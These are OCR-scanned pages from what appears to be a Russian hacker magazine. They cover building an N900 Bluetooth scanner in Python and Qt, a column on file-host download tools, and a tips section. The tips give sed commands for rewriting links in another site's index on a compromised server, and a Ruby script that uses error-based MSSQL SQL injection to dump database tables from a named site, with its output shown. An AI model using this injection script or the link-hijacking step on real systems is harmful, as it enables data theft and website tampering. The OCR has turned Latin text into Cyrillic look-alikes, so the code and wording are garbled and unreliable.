НЕТ НИЧЕГО ПРОЩЕ, НЕМ СКАЧАТЬ 
ПРОГРАММУ ИЗ РЕПОЗИТАРИЯ И 
УСТАНОВИТЬ ЕЕ ОДНИМ КЛИКОМ. НО 
ЕДВА ЛИ НАС УСТРОИЛА БЫ ПЛАТФОРМА. 
КОТОРАЯ ХОТЯ И НАЗЫВАЛАСЬ БЫ 
ЫІШ'ОМ. НО ПРИ ЗТОМ ОГРАНИЧИВАЛА 
НАС ПО ЧАСТИ РАЗРАБОТКИ. К СЧАСТЬЮ 
ДЛЯ МАЕМО. У НЕЕ И ПО ЗТОЙ ЧАСТИ ВСЕ В 
ПОРЯДКЕ. А ПОТОМУ- ДЕЛИМСЯ ОПЫТОМ. 



т ч 

ы 



Магіпа Нагі55оп 

© 04:32 



и! Зреакег 



ели посмотреть на репозитарий приложений месяц назад, 
когда я делился своими впечатлениями от общения с мини- 
компьютером от ІМокіа, и сейчас, то это две большие разницы. 
Программ становится все больше: часть портируется с ОеЬіап, 
часть со старых версий Маето, которые использовались в 
предыдущих моделях интернет-планшетов, а часть разрезывается с 
нуля. И хотя хочется верить, что во всем этом разнообразии найдется 
нужный инструмент, я уже не раз оказывается в ситуации, когда под- 
ходящей программы в репозитарии не оказывалось. В частности, для 
экспериментов с ВІиеІооШ мне был нужен сканер, который находил бы 
устройства в эфире и выводил их МАС-адреса — и такого инструмента 
яненашел.Но раз уж имеем дело с гиковским девайсом, то решено: 
пойдем до конца и напишем приложение сами. Тем более что платформа 
Маето в этом плане крайне дружелюбна. 

УСТАНАВЛИВАЕМ СРЕДУ РАЗРАБОТКИ 

Основным языком разработки для Маето 5, как и для любого другого 
І_іпих, конечно же, является Си. Подробный Маето 5 ЗйК, содержа- 
щий линуксовые утилиты и необходимые привязки, — лишнее тому 
подтверждение. Но программирование на Си, безусловно, требует 



серьезных навыков программирования, задача еще больше услож- 
няется необходимостью изучения мобильной платформы. Но! Для 
Маетоб доступен полноценный интерпретатор РуіЬоп и, что не менее 
важно, портированы многочисленные библиотеки. Значит, можно 
использовать всю простоту питона и без лишней прелюдии взяться за 
разработку нашего приложения! 

Интерпретатор РуіЬоп доступен в виде пакета таето-руібоп-сіеѵісе- 
епѵ в менеджере приложений. Убедиться, что интерпретатор устано- 
вился правильно, можно, открыв X Тегтіпаі и набрав команду руіЬоп. 
После этого ты окажется в приветственной консоли интерпретатора: 

РуЩіоп 2.5.4 (г254:67916, ОсС 92009, 00:02:36) 

[ССС 4.2.1] оп 1іпих2 

Туре "Ііеір" , " соругідЬД " , "сгесИСз" ог "Іісепзе" Ног 
тоге іпНогтаНіоп . 

»> 

В принципе можно попробовать запустить какой-нибудь несложный 
сценарий на Руібоп'е уже сейчас, используя специально заготов- 
ленный ЬазЬ-скрипт: гип-зІапсІаІопе.зЬ <название_скрипта.ру>. Для 
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этого подошел бы стандартный текстовый редактор, но это не сильно 
удобно. Конечно, можно заниматься разработкой скрипта на компью- 
тере и далее вручную перекидывать его на телефон по 55Н/5СР или 
еще как-нибудь, но и это не лучший вариант: о человеческой отладке 
пришлось бы забыть. Впрочем, все эти заботы ни к чему, потому как 
для разработки Руібоп-приложений для Маето есть замечательная 
ЮЕ — РІиіЬоп. Основанная на всем известном Есіірзе’е, она позволяет 
разрабатывать и отлаживать скрипт на компьютере, а тестировать его 
прямо на телефоне. Причем этот вариант подходит для любой платфор- 
мы: винды, линукса или мака. Для запуска понадобится лишь скачать 
два архива с рІиіЬоп.дагаде.таето.огд и распаковать их в одну папку. 
Помимо этого требуется, чтобы в системе был установлен бРЕ [іаѵа.зип. 
сот ). Все необходимое можно не качать, а взять с нашего диска. 

ПОДГОТОВКА ПРОЕКТА 

Позаимствованный у Руйеѵ редактор кода предоставляет все прелести 
ЮЕ: автодополнение кода, сниппеты, подсказки — все, что и без того 
может ускорить разработку. Далее схема действия Ріиібоп очень про- 
стая: разрабатываемый скрипт по команде на запуск перебрасывается 
через 55Н на телефон и уже на мобильной платформе начинается его 
исполнение. По этой причине важно, чтобы на N900 был установлен 
0реп55Н-сервер, что легко делается через менеджер пакетов (подроб- 
нее читай в статье прошлого номера). Особенно приятно, что телефон 
вовсе необязательно подключать по 115В к компьютеру: намного удоб- 
нее это сделать через беспроводные В1ие1:оо1:б или ѴѴі-Еі. Попробуем? 
Для начала создадим новый проект (меню Еііе -> Ріиібоп Рго)ес1: 

Етріу Руібоп Рго)ес1;), далее жмем Ыехі: и выбираем способ удален- 




РІ_ІЛНОМ — СРЕДА РАЗРАБОТКИ ДЛЯ МАЕМО 

ного подключения к телефону. Какой бы способ ты ни выбрал — Б5В, 
ВІиеЕооІіЬ, ѴѴЕАЫ аб-Ьос — не поленись зайти в настройки. Здесь необ- 
ходимо правильно указать ІР-адрес девайса, а также имя пользователя 
для работы в системе. Чтобы не было проблем я обычно отлаживаю 
программы под рутом, хотя это и может быть небезопасно. Далее нажа- 
тием на кнопку Еіпізб мы создаем проект. 

Тут надо сказать, что по умолчанию Руібоп установлен в «голом» виде, 
в нем практически нет готовых модулей. Поэтому все приходится уста- 
навливать дополнительно в виде специального пакета РуМаето, пред- 
ставляющего собой сборку сортированных модулей для платформы 
Маето. Нас в первую очередь интересуют два модуля: 

• РуМаето/НіІсіопОезкІор, предоставляющий привязки для использо- 
вания интерфейса Маето; 

• РуВІиеі — обертка для простого использования встроенного 
ВІиеЕооІіЬ. 

В ином бы случае РуМаето пришлось устанавливать вручную, но 
РІиЕЬоп в момент создания нового проекта предлагает проверить 
мобильное устройство на наличие необходимых для комфортной раз- 
работки библиотек. В случае необходимости, все подкачивается из 
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инета и устанавливается автоматически, а тебе остается лишь смо- 
треть на сообщения в логе. 

ПРИСТУПАЕМ К РАЗРАБОТКЕ 

Теперь вернемся к нашей задаче — нам необходимо просканиро- 
вать В ІиеТооТЬ-эфи р. Установив РуМаето, который включает обертку 
РуВІиег, мы сильно облегчили себе задачу, потому каку нас больше 
нет необходимости заморачиваться по поводу низкоуровнего взаи- 
модействия с ВТ-модулем (вот они прелести РуТЬоп !) . Библиотека все 
сделает сама: главное не забыть ее импортировать, поэтому делаем 
это в первую очередь: 

ігпрогС ЫиеСооСЪ. 

Операция по поиску беспроводных устройств в эфире называется 
Бізсоѵег и реализована в библиотеке Ыиеіооіб как один из методов. 
Причем в качестве параметров можно указать, определять ли имена 
устройств (их числовой идентификатор, например, з1:ер_покіа, N900- 
рбопе и т.д.) или нет. В ответ функция возвратит список, в котором будут 
имена устройств и их МАС-адреса — естественно в случае, если таковые 
имеются. Присвоим результат сканирования переменной пеагбу_сІеѵісе5: 

пеагЪу_с!еѵісез = 

ЫиеСооСІі . йізсоѵег_сіеѵісез ( 1оокир_патез = Тгие) 

Теперь остается только вывести результат сканирования. Для простоты 
примера представим, что имеем дело с обычном консольным прило- 
жением и для вывода будем использовать стандартную функцию для 
вывода текстовых данных: 

ргіпР "Ноипсі %с! сіеѵісез" % Іеп (пеагЪу_сіеѵісез ) 

Ног аскіг, пате іп пеагЪу_с!еѵісез : 
ргіпН " %з - %з" % (асісіг, пате) 

Теперь соединяем все вместе и через меню Пип Пип отдаем коман- 
ду на запуск, предварительно проверив, что на телефоне включен 
ВІиеЕооЕЬ. В момент первого запуска Ріиібоп поинтересуется, каким 
образом ему переносить исходник на мобильное устройство: безопасно 
монтировать удаленный диск или копировать скрипт по 55Н. Второй 
вариант не требует настройки, поэтому будем использовать его. 
Единственное, что нужно, — это ввести пароль пользователя, который 
ты ранее указывал в момент настройки подключения. Если ты так же, 
как и я, указал гооЕ то вспомни тот пароль, который указал в момент 
установки приложения гооізб. 

В случае успеха в панели для отладки РІиТбоп отобразится вывод 
скрипта: имена всех найденных устройств, а также их МАС-адреса. 
Можно также запустить сценарий из консоли: передав название 
скрипта в качестве аргумента гип-зІапсІаІопе.зЬ. Правда, прямо ска- 
жем, что на мобильное приложение это пока явно не похоже. 

СОЗДАЕМ ИНТЕРФЕЙС ЧЕРЕЗ ОТ 

Чего не хватает нашей программе, так это полноценного графического 
интерфейса. К счастью, существует несколько вариантов наверстать 
упущенное. Можно, как и для более ранних версий Маето, использовать 
библиотеку СТК. Но раз уж компания N 0 ^ приобрела небезызвестный 
набор библиотек 01 и, тем более, портировала его для Маетоб, то было 
бы глупо отказываться от использования новой технологии. Причем, 
если ты уже имел опыт разработки с использованием ОС то ничего ров- 
ным счетом не изменится: на N900 все работает точно так же, каки под 
виндой или обычным линуксом. Вплоть до того, что можно взять готовые 
примеры и без труда запустить их на мобильной платформе! 

Поскольку приложение мы разрабатываем на РуОзоп, то необ- 
ходимо установить для СИ необходимые привязки: РуСИ ( ѵѵѵѵѵѵ. 
гіѵегЬапксотриІіпд.со.ик ] или Ру5ісІе ( ѵѵѵѵѵѵ. рузісіе.огд ]. Мы будем 
использовать первый вариант. Для этого, как в Бебіап или ІІЬипІш, 
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*■ 14:58 Е||”* X ТегтіпаІ » X 



- # руЬЬоп 

РуЫюп 2.5.4 (г254:67916, Ыоѵ 26 2009, 22:24:46) 

| ССС 4.2.1] оп 1іпих2 

Туре "Ьеір", "соругідЪЪ", "сгесііъз" ог "Іісепзе" Гог тоге іп 
Гогтпа^іоп . 

»> ргіпь "Ьаскег" 

Ьаскег 
»> ехіг () 

- # 

- # гип-зГапгіаІоле.зН руі:Ноп зе^ир.ру 
Гоиікі 2 сіеѵісез 

00:17:Е4:7С:62:93 - НТС_Р3300 

00 : ІА: 92 : 79 : ЕЗ : 6С - ТНІ5ІЗЫОТЕВООК 

- •- | 



Ч С(гІ ТаЬ Е$с РдІІр Рдйп Н 

ЗАПУСКАЕМ НАШ СКРИПТ В КОНСОЛИ 
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*■ 15:31 N900 ВІиеіооМі $саппег X I 

$сап поѵѵ! I 



00:17:Е4:7С:62:94 - НТС.РЗЗОО 
00:1А:92:79:ЕЗ:7С - ТНІ5І5МОТЕВООК 
00:16:12:АА;6Р:91 - ВТ.СМ 



ГОТОВОЕ ПРИЛОЖЕНИЕ: РЕЗУЛЬТАТ 
СКАНИРОВАНИЯ ВЮЕТООТН-ЭФИРА 




> іпРо 



Хочешь еще больше 
инфы об N900? На 
уу\ллл/.хакер.ги/Ы900 

мы ведем специ- 
альный раздел, где 

делимся секретами 
работы с новой плат- 
формой Маетоб. 



ВАЖНО, НТО ДЛЯ НАЧАЛА РАЗРАБОТКИ ПРИЛОЖЕНИЯ НЕ 
НАДО МОРОНИТЬ ГОЛОВУ С ИЗУЧЕНИЕМ НОВОЙ ПЛАТФОРМЫ. 

ИСПОЛЬЗУЯ УЖЕ ИМЕЮЩИЕСЯ ЗНАНИЯ РѴТНОИ’А И БИБЛИОТЕКУ 
ОТ, МЫ СХОДУ СМОГЛИ РАЗРАБОТАТЬ РАБОТОСПОСОБНОЕ 
ПРИЛОЖЕНИЕ ДЛЯ ИОКІА N900. 



воспользуемся пакетным менеджером арі-деі. Открываем 
консоль, переходим в режим рута (зибо даіпгооі] и далее 
набираем команду для инсталляции РуОі (пакет называет- 
ся руіЬоп2.5-д1:4]: 

арС-деС іпзСаІІ руСЪ.оп2 . 5-дР4 

Для того чтобы вникнуть в азы проектирования интерфей- 
сов на Оі, рекомендую прочитать очень доходчивый ману- 
ал, который выложен на диск. А пока попробуем на нашем 
примере разобрать общие черты приложения. Первым 
делом импортируем нужные библиотеки ОП 

ітрогР зуз 

ігот РуСЩ4 ітрогР ОРСиі , ОРСоге 
ітрогР ЫиеРооЫг 

Далее создаем класс с нашим основным окном и обозна- 
чим для него заголовок «N900 ВІиеІюоОз-зсаппег»: 

сіазз МаіпЭДіпйсж (ОМаіпМіпсІсж) : 

сіеР іпіР (зеІР, *агдз) : 

арріу (ОМаіпМіпсІсж. іпіР , (зеІН,) + агдз) 

зеіі . зеШіпсІоѵіГіЦІе \ 

( 'N900 ВІиеРооЫт зсаппег' ) 

Главный компонент окна ОТехІЕбіІ, в который мы поме- 
стим вывод информации о найденных устройствах: 

зеІП .Ьгомзег = (УГехРЕсІіЦ ( ) 

Как и в предыдущем примере, получаем информацию об 
устройствах в эфире с помощью метода бІ5соѵег_беѵісез() 
и добавляем имя и МАС-адрес устройства в наш ОТехіЕсІ И;, 

ИСПОЛЬЗУЯ ЦИКЛ: 

пеагЪу_с!еѵісез = ЫиеСооРЪ. . с!ізсоѵег_с1еѵісез ( 
1оокир_патез = Тгие) 



Рог аскіг, паше іп пеагЬу_с!еѵісез : 
зеІР . Ьгсжзег . аррепсі ( " %з-%з" % (асМг, паше)) 

Далее создаем экземпляр объект нашего окна и запускаем 
цикл с обработчиком событий: 

арр = ОРСиі . ОАррІісаРіоп (зуз . агдѵ) 
дЬ = МаіпШіпсІом ( ) 
дЬ . зРютлг ( ) 

зуз . ехіР ( арр . ехес_ ( ) ) 

Теперь можно оформить наше приложение в виде йеЫап- 
пакета, готового к установке. В этом опять же нас выручит 
среда разработки РЦДЬоп. Достаточно запустить специ- 
альный мастер через меню Ехроіі РІиТЬоп ЕхрогР Іо 
ОеЬіап Раскаде, после чего, выбрав платформу Маето, 
получить готовый к распространению пакет. Правда, для 
запуска программы на другом телефоне, потребуется уста- 
новленный интерпретатор РуОзоп. 

ДАЛЬНЕЙШАЯ РАЗРАБОТКА 

Теперь, когда наша программа получила очертания обыч- 
ного для N900 приложения и выполняет вполне конкрет- 
ную цель, можно дополнить интерфейс дополнительными 
элементами. Я добавил кнопку «Начать сканирование» и 
реализовал сканирование эфира по запросу, а, используя 
базу «МАС-адрес — производитель», мог бы добавить 
функцию определения имени производителя. Исходники 
мы выложили на наш ОѴО. Возможности РуВІиег, помимо 
всего прочего, позволяют легко определить, какие серви- 
сы предоставляет беспроводное устройство, а значит, ты 
без труда сможешь реализовать и такую возможность. 
Важно, что для начала разработки приложения не 
надо морочить голову с изучением новой платформы. 
Используя уже имеющиеся знания РуОзоп’а и библиотеку 
ОС мы сходу смогли разработать работоспособное прило- 
жение для Иокіа N900. Осталось выложить его в девело- 
перский репозитарий :]. ц-ц 
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КОЛОНКА РЕДАКТОРА 



Хочу поделиться с тобой своим опытом обще- 
ния с различными файлобменниками типа 
гарісІзЬаге.сопп. Когда только появился сам 
гарісізбаге (тогда еще в домене .бе) и практи- 
чески все пользовались только им, проблем 
не было никаких. В издательстве откуда-то 
взялся Р ге т і и т -аккаунт, который разошелся 
среди своих. Круг «своих», конечно, расши- 
рялся не по дням, а по часам, поэтому сооб- 
щения о превышении недельного лимита на 
скачку очень скоро стали обычным явлением. 
Дальше появилось куча клонов: Медаиріоасі. 
сот, РіІеРасІогу.сот, ОерозііЯІез и много- 
много других, в том числе российских. 

Каждый оказывался еще более изворотливый 
в подсовывании рекламы, попапов, а также 
ограничениях, которые непременно накла- 
дываются на пользователей, нежелающих 
приобретать платные аккаунты — в конце 
концов, пользоваться ими стало окончатель- 
но невыносимо. Если есть возможность, я 
непременно скачаю файл через іоггепКы или 
найду человеческое НТТР/РТР-зеркало, но 
если такой возможности нет? Мысль сидеть 
с открытой вкладкой браузера, пытаясь про- 
браться через тонну рекламы и таймеры, 
отделяющие от закачки, всегда казалась 
чрезвычайно унылой, как и идея разного 
рода Р ге т і и т -аккаунтов. 

Но при всей нелюбви ктаким сервисам, 
использовать их приходится часто. Некоторые 
вещи нигде, кроме файлообменников, не 
найти. Когда-то давно я использовал непло- 
хую программу ІІпіѵегзаІ БЬаге Ооѵѵпіоасіег 
( ѵѵѵѵѵѵ.бітопіи5.ги/?и5б ). Накидал ей ссылок — 
и она сама качает, как только это станет воз- 
можным, лишь иногда спрашивая ввести 



капчу. С другой стороны, не сильно хочется 
возиться еще с какой-то программой, когда 
нужно скачать один единственный файл. С 
нынешними скоростями я уже давно отка- 
зался от всяких менеджеров закачек и все 
скачиваю только браузером. В этом плане 
настоящей находкой стал плагин БкірБсгееп 
[ зкірзсгееп.сот ] для Рігебох. Теперь, если 
открыть ссылку на РарібзЬаге.сот и десятке 
других сервисов, то плагин произведет авто- 
матическую замену НТМЕ-контента, скромно 
говоря: «Ничего не делайте. Закачку я начну 
сам, как только это станет возможным». И 
начинает! Забавно, что один из файлооб- 
менников Мебіабге.сот пытался, как ему 
казалось, настучать в отдел по модерирова- 
нию аддонов к Рігеіюх'у. В результате Могіііа 
запрос отклонила, а плагин стал еще более 
популярным :). 

И все-таки, что делать, когда нужно скачать 
с файлообменника сразу десяток-другой 
файлов. В конце концов, где ты видел фильм, 
который выложен полностью и не поделен 
частей так на 30? Опять же, файлообмен- 
никам не место жалко, — искусственное 
ограничение на размер одного файла позво- 
ляет им показывать еще больше рекламы, 
еще больше бесить пользователя, чтобы тот 
покупал платные аккаунты. В такой ситуации 
самое лучшее решение — это менеджер 
закачек бОоѵѵпІоасіег Цбоѵѵпіоабег.огд ). 
Умопомрачительная прога написана на баѵа 
и сделает все, чтобы глаза твои больше фай- 
лообменников не видели. Скопируй ссылку. 
Дальше 60 действует сам — формирует 
ссылки в пакеты (если, например, файл раз- 
бит на 10 или хоть 20 частей), проверяет, 



доступен ли файл, потом сам распознает 
«капчу» (лишь иногда выскакивает окно для 
ввода), сам ждет, сколько нужно, и дальше... 
сообщает тебе, когда файл будет скачен. 
Можно даже настроить автоматическую рас- 
паковку многотомных архивов — тоже запро- 
сто. Если 30 ссылку не подхватил, значит, 
он не поддерживает этот сервис. Поверить 
сложно: для программа разработано такое 
бешенное количество плагинов, что, кажется, 
подходящий аддон есть для любого файлооб- 
менника на свете. Словом, суперинструмент. 

И да. Если вдруг тебе самому нужно выло- 
жить большой файл, не мучай людей. Не 
надо. Воспользуйся «Народ. Диском» от 
«Яндекса». Максимальный размер для одно- 
го файла в 5 Гб — единственное ограничение 
этого хостига, где нет рекламы, таймеров и 
прочей ерунды, т 
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ЗАДАЧА: ОТРЕДАКТИРОВАТЫЕКСТ ЧЕ- 
РЕЗ КОНСОЛЬ ПОРУТАННОГО СЕРВЕРА 



РЕШЕНИЕ: 

Часто бывает необходимо как можно быстрее отредактировать файлы 
прямо на сервере. Иногда это нужно сделать через Іеіпеі (Ьаск-соппесі, 
Ьіпб рогі], когда работа таких редакторов какѵі или етасз невозможна. 
Но, независимо от типа подключения (Ьаск-соппесі, ббЬ, другое], можно 
воспользоваться потоковым редактором зеб. 

Предположим, у тебя есть такой конфиг: 



<? 

//сопі . ЙЪ 
$йакаЪазе="туйЪ" ; 
$изег="пемз_изег" ; 



$раззѵгогй= п Оіп08С1:к! " ; 

?> 

Если забыл поменять пароль перед заливкой файла, выполни в консоли 
сервера команду: 

$ зесі ' з/О5п08С1:к! /пемраззмогй/ 1 сопі.йЪ > ктр . іог . зей && гпѵ 
кшр . іог . зей сопі . ЙЪ 

Зеб также поддерживает регулярные выражения. Это очень удобно. Вот 
так, например, можно заменить все внешние ссылки в чужом индексе 

СВОИМИ: 

$ зей -е ' з/Ьгеб^'ЩЩр :\ /\/ [ Ап ] " п /Ь.геі = "Ы:Ьр: //уоигііпк. 
сош»/д' іпйех.ѣДжіІ 




ЗАДАЧА: УСТАНОВИТЬ ПЛАГИН 
РІКЕРОХ ДЛЯ БОЛЕЕ СТАРОЙ ВЕРСИИ 



РЕШЕНИЕ: 

ЕігеЬх часто обновляется и не всегда разработчики расширений успевают 
пересобрать расширения под новую версию. Конечно, лучше дождаться, когда 
разработчики сами сделаютэто, но, если тебе уже совсем невтерпеж, то следуй 
моим советам и утебя все получится. 

1. Качаем нужный тебе плагин, изменяем расширение файла на .гір и распако- 
вываем. 

2 . Открываем файл іпзІаІІ.гсКи находим там секцию вроде этой: 

<еш: ТагдекАрр1іса1:іоп> 



<БезсгірЫ.оп> 

<еш: ій>{ес8030і7-с20а-4б4і-9Ь0е-13аЗа9е97384}</ет: ій> 
<еш:тіпѴегзіоп>1 . 0</ет:тіпѴегзіоп> 

<еш:тахѴегзіоп>2 . 0</еш:тахѴегзіоп> 

</Безсгіркіоп> 

</ет: іагдекАрр1ісакіоп> 

Теперьзаменяем значение тахѴегзіоп на свое или на старше, например, 4.0, и 
сохраняем изменения. 

3. Запаковываем назад в Ир-архив и меняем его расширение на .хрі. 

Все, теперь можно устанавливать расширение, просто перетащи его в свой 
РігеЕох. 

Но помни: этот метод срабатывает не всегда, есть расширения, которые просто 
несовместимы с новыми версиями Еігеіох. 




ЗАДАЧА: БЫСТРО СДАМПИТЬ ДАННЫЕ 
ИЗ М5501. 2005/2008 



РЕШЕНИЕ: 

Можно воспользоваться уже привычными инструментами вроде 5ІРТ или 
Рапдоііп. 

А можно использовать технику 5РХ-50Ы. Именно на ней остановлюсь 
чуть подробнее. 

В М55ОЕ2СЮ0 с помощью оператора РОРХМЕ можно получать результаты 
запроса в видеХМЕ. 

ЗЕЬЕСТ * ЕКОМ іпіогтайіоп_зсЪета .йаЫез ЕОК ХМЬ НАМ; 

Что вернет содержи мое табл и цы в видеХМЕ. Однако в М550Е2000 
выражение РОРХМЕ не можетбыть использовано в подзапросе, поэтому 
дам пить да иные с помощью РОРХМЕ можно, начиная с 2005 версии 
МЗЗОЕ-сервера. 

► 038 



1. Когда естьобычный вывод с помощью ипіоп (пе\л/з.азр?іб=1 ипіоп зеіесі: 
Іор 1 пии,пии,пии,1:аЫе_патеі : гопп іпі : огтабоп_5сбета.1;аЫе5-- ), вос- 
пользуйся утилитой от Оапіеі КасЬакіІ. Скачать ее можно тут: трУАллллл/. 
касбакіІ.сот/рарегз/ЗРХ-ЗОЕі-еп.Ыт . 

2 . Комбинируя методЗРХ-ЗОЕі с функцией зиЬзЕппдО, можно дампить 
данные и через вывод в ошибке(еггог-ЬазесІ ЗОЕі]. Специально для этого 
я написал скрипт на Руби: 

#! /изг/Ьіп/гиЬу 
#настройки тут 

зіЬе= п кЪарігіра.ги»# доменное имя 

рак]і= п /йіг/ііпкйекаіі .азрх»# путь до уязвимого скрипта 
іп б есі = " ій=1+апй+1= " #уязвимый параметр 

каЫе="іпЕогшакіоп_зсЬ.еша.со1шппз» #название таблицы, кото- 
рую дампить 

#дальше ничего не меняем 
гедиіге 'пек/ЫЩр' 
гедиіге 'сді' 
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Процесс дампа с помощью скрипта на НиЬу 



раѵеІ@Іар(ор: - _ п > 



Рііе ЕсІИ: Ѵіеѵѵ ІегтіпаІ Неір 



раѵеІ@Іар1:ор:~$ ѵ/ЬісИ гиЬу I 

/и$г/Ып/гиЬу 

раѵеІ@Іар1:ор:~$ гиЬу -ѵ 

гиЬу 1.8.7 (2009-06-12 раИсЫеѵеІ 174) [х86_64-1іпих] 
раѵеІ@Іар1:ор:~$ гиЬу з'ГхзрІі.гЬ > сіитр.хті 
раѵеІ@Іар1:ор:~$ 



Утилита от Оапіеі КасЬакіІ 
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► 039 





ш 






Еагу 


Еагу 


Еагу 


Наск 


Наск 


Наск 



оиіриіІепдіЪ. =0 

кіір = Ыеі: :НТТР.пем(зііе, 80) 

радераііі = " # {раііі} ?# {іп] есі} ' # { 1 а ' *4000 } ' " 

гезр, баіа = Ъіір . деі (радераіЬ, піі) 

оиіриіІепдіЪ. = сіаіа . зсап (%г {Сопѵегзіоп іаііесі ѵтЬеп сопѵегііпд 
іЬ.е ѵагсЬаг ѵаіие 1 ( .*?) \ . \ . \ . }іш) [0] . іо_з . ІепдіЬ. - 20 
зіагііпсіех =0 
ргіпі "<#{1:аЫе}>" 
ѵЛііІе ігие (іо 

гедиезі = «#{раіЬ} ?#{іп]есі}зиЪз1:гіпд ( (зе1есі+* + ігот+#{1:аЫ 
е} +РОК+ХМЬ+КАМ) , # {зіагіітіех} , # {оиіриііепдііі} ) -- " 
гезр, баіа = Ьіір . деі (гедиезі , піі) 

шаРс]і= баіа. зсап (/Сопѵегзіоп іаііесі ѵіЪеп сопѵегРіпд Рііе 



Результат работы скрипта (файл открыт в Рігеіох] 

ЕНе ^іеѵу Ні^согу Цооктагкз ЗЪЫв леір [Д ѵ |ЗоодЕе 

^ / |~@ | Ше:///Ьоте/раѵ&І/гіитр.хігіІ 
Іо йІеЛоте/рзѵеІДІитр.хт! 



пѵагсЬаг ѵаіие ' ( [ДѵЛЭД] *?) ' іо сіаіа іуре іпі/іт) 

Ьгеак іі таісЫО] , іо_з . ІепдіІковЬриіІепдіІі ог ІтаісЬ.апу? 
ргіпі СОІ . ипезсареНТМЬ (таісЫО] . іо_з) 
зіагііп<іех+=оиіриі1епді:Ь 
епб. 

ргіпі "</#{іаЫе}>" 

Отредактируй скрипт (внеси данные своей БОЮ, а потом запусти его так: 
$ гиЬу зіхздІі.гЬ > бишр.хті 
В файлебитр.хтіты получишьданныетаблицы вхті. 



МогіІЗа РігеІЪх 




— <ш Іо гт а Но пвсЬета.соІи пш 8 > 

< гоѵѵ ТАВ ЬЕ_С АТАЕОС = "кЬ " ТАВЕЕ_5СНЕМА= "4Ъо" ТАВІЕ^АМЕ^'ІРЬоІо" 1 СОЬиМК_МАМЕ= ,, 51оге' ОКОШЛЬ Р05ГТКШ="4 
ВАТА_ТТРЕ= "ітаде " СНАКАСТЕК_МАХІМиМ_ЬЕМСТН-"2 147483647“ СНАВЛСТЕК ОСТЕТ ЕЕМСТН="2147483647'У> 

<П№ ТАВ ЬЕ_С АТАЕОС = " кЬ “ ТАВЬЕ_5СНЕМА= "ЙЬо І " ТАВТЕ_МАМЕ="І:Кеа11уОісНопагу" СОьймМ^АМЕ^'ижтТехГ ОКШ 1 ѴЛІ. ] 
15 ЫШ-1АВТЕ="МО И РАТА_ТУРЕ=‘Чех1:" СНАКАСТЕК МАХІМШ1_ЕЕЖ;ТН= ,, 2147483647 Н СНАКАСТЕК_ОСТЕТ_ЕЕ^ТН="2147 
СНАКАСТЕК_5ЕТМАМЕ= "ср125І" С О ЕІАТІОЙМЧАМ Е= "СугіШсСепегаІ СІ А5'У> 

<ГО№ ТАВ ЕЕ С АТЛЬОС = " Й) " ТАВ ЕЕ_5С НЕМА=”(ІЪо " ТАВЕЕ_МАМЕ="Шос И СОШМЫ МАМЕ=”Оос" 0КВШАТ_Р05т0Ы= ,, 1" I! 
ОАТА_ТѴРЕ="ІехГ СНАКАСТЕВ_МАХІМІІМ_ЕЕ!ЧСТН=''2147483647" СНАКАСТЕВ_ОСТЕТ_ЬЕКСТН-"2 147483647" СНАКАСТЕР 
СОЕІАТЮГі}_ЫАМЕ= 'СугШіс Сепегаі СІ А5"/> 

<голѵ ТАВ ЕЕ_С АТАТОС = кЬ Г ТАВ ЬЕ_5 С НЕМ А= "(іЬо " ТАВЕЕ_МАМЕ= ,, Щапде" СОШМЫ^АМЕ^ОіѵпегСшсГ 0КШМАЕ_Р08ГП< 

РАТА ТУРЕ- "шііфіекіепШІег'У > 

<ГО№ ТАВ ЬЕС АТАТОС = кЬ ТАВЬЕ_5СНЕМА= "ЙЬо'' Т.АВТЕ^АМЕ= ,, 150СГ" СОЬШШ КАМЕ="50СВЕеѵеГ" ОКРШАЬ_Р05тОІ 
РАТА_ТУРЕ= "іпі" (ѴШМ Е КІС_РНЕСІ5 ІОМ= 1 0 " ЛСМЕШС РКЕСКЮМ-НАВК^Ю’" МШ1ЕКІС_5САТЕ= ,, 07> 

< гоѵѵ ТАВ ЬЕ_С АТАТОС = " кЬ ~ТАВ ТЕ_5С НЕМ А="(1Ьо 11 ТАВІЕ_МАМЕ="ТКапде“ СОТI^МN_NАМЕ="НапдеI(і" ОВШЫАТ_Р05ІТІОМ 
РАТА_ТѴРЕ="ІпГ ЫТІМЕК1С РКЕСІ5ЮЫ ="10" МиМЕШС_РКЕСІ5Ю^КАІ)ІХ=“10" МТІМЕМС8САТЕ='07> 

<го№ ТАВ ТЕ САТАГОС='кЪ~ТАВТЕ 5СНЕМА="4Ьо" ТАВТЕМАМЕ^Жед^Ь-у'' СОІЛЛѴШ NАМЕ= "КедівІгуИ" ОІШШАТ_РОН1Т] 
РАТА_ТУРЕ="‘тГ ІѴШМЕШС_РКЕСІЭЮМ = 1 1 О" ЫЦМЕНІС РКЕСКЮ^КАРИУіО"' Г'ШМЁШС_5САЕЕ=‘07> 

<гоѵѵ ТАВ ТЕС АТАТОС =кЬ ТАВЕЕ-ЗСНЕМА^'сШо 1 " ТАВТЕ_МАМЕ="15осг" СОІЛ1МЫ_ЫАМЕ="5окгМ" ОК0ІЫАТРО5ГГЮМ=‘] 
РАТА_ТУРЕ = "щі" МЧМЕКІС_РВЕСІ5КЖ = '"10“ РѵШМЕШС РКЕСКГОМ-КАРК^ПО"" МЕІМЕКІС5САЕЕ='07> 
<пшТАВІ.Е_САТА1.0е = "кЬ" ТАВ ТЕ_5 С Н Е М А = " сІЬо " Т.АВТЕ^АМЕ=ТЗраш" СОЕРММ^АМЕ='5ратИ"' <ЖРМАЕ_Р05ГП(Ж= 
РАТА_ТУРЕ="ІПІ"’ АШМЕКІС_РНЕСІ5ІОК ="І0" ІЧІ1МЕШС РКЕСІ8ІОМКАРІХ=Т(Г Г4ЦМЕК1С_5САЕЕ="07> 

<го№ Т.АВ ТЕС АТАТОС = кЬ ТАВ ТЕ_5 С НЕМ А= " сШо " Т.АВТЕ_КАМЕ="ШеаИуОісйапагГ СОТиМ^КАМЕ-'ТІетМ" ОКЮШАС_РС 
15 ЫТІТТАВТЕ=‘"МО ОАТА_ТУРЕ=" іпГ ЫимЕШС_РКЕСІ5КЖ="7СГ N^МЕШС РКЕСI5ЮN К.А^IX= , Ю ,, МиМЕК1С_5САТЕ=""07 

< ГО№ ТАВ ТЕС АТАТОС =кЬ ТАВТЕ_5СНЕМА="сІЬо'" Т.АВТЕ_ХАМЕ="ІОЬ1есЬ5" СОТ^МN_NАМЕ="ОЬ^есаI1 , ' ОКП^ АІРОВПІОГ 
ОАТА_ТУРЕ= "ІпГ" Ж1М ЕЫС_РНЕСІ5 ІОК- "Т 0 " КЦМЕШС РКЕСКГО^КАОК- 'Ю" N^МЕШС_5САТЕ- ,, 0'7> 

